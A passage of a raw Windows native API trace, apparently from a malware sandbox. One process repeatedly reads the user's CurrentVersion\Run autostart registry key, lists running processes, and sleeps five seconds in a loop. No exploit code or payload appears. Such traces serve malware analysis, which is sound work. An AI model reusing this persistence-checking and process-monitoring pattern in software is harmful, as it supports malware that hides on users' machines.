Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.124] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.124] NtClose (Handle=0x154) returned 0x0 [0186.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.139] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.140] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.140] NtClose (Handle=0x154) returned 0x0 [0186.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.143] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.156] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.156] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.156] NtClose (Handle=0x154) returned 0x0 [0186.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.162] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.171] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.171] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.171] NtClose (Handle=0x154) returned 0x0 [0186.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.174] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.187] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.187] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.187] NtClose (Handle=0x154) returned 0x0 [0186.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.192] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.213] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.213] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.213] NtClose (Handle=0x154) returned 0x0 [0186.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.217] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.217] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.218] NtClose (Handle=0x154) returned 0x0 [0186.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.221] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.233] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.233] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.233] NtClose (Handle=0x154) returned 0x0 [0186.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.237] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.249] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.249] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.249] NtClose (Handle=0x154) returned 0x0 [0186.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.253] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.266] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.266] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.266] NtClose (Handle=0x154) returned 0x0 [0186.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.272] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.280] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.280] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.280] NtClose (Handle=0x154) returned 0x0 [0186.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.283] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.299] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.299] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.299] NtClose (Handle=0x154) returned 0x0 [0186.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.305] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.311] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.311] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.311] NtClose (Handle=0x154) returned 0x0 [0186.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.314] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.327] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.327] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.327] NtClose (Handle=0x154) returned 0x0 [0186.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.328] NtFreeVirtualMemory 